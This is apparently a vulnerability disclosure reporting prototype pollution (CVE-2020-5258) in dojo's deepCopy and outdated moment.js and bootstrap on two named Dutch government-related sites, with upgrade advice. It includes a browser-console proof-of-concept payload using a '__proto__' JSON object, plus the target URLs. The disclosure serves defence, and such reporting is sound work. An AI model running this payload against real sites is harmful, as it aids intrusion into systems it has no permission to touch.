The deepCopy method within dojo could be tricked into adding or modifying properties of Object.prototype. VULNERABLTIES: Outdated &vulnerabel components in use + Prototype pollution (CVE-2020-5258). Apart from dojo.js, moment.js (2.2.2) and bootstrap (3.4.0.) versions are outdated and vulnerable with public exploits. These two could not be exploited.
IMPACT: Prototype pollution could have significant impacts on the security and functionality of an application. It occurs when an attacker is able to modify the prototype of objects, leading to unintended behaviors and potential security issues. This could lead an attacker to Data Manipulation, Property Injection, Denial of Service, Arbitrary Code Execution, Bypassing Security Controls, Spoofing and Tampering, security Bypass or Cascading Effects HOW TO SOLVE IT: Just upgrade Dojo to the latest version. Also upgrade bootstrap & moment.js :)
Open the website and go to the developer settings in the navigator (used Chrome) Right button --> Click Inspect. After that, go to console and paste the following code:
require(["dojo/request/util"], function(lang) {
var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
var a = { b: "c", d: "e" };
var newOjb = lang.deepCopy(a, JSON.parse(malicious_payload));
console.log({}.vulnerable);
})
https://www.testuitvoeringarbeidsvoorwaardenwetgeving.nl/mozard/!suite86.scherm0404
https://www.uitvoeringarbeidsvoorwaardenwetgeving.nl/mozard/!suite05.scherm1496?mNch=fy4h66vl8d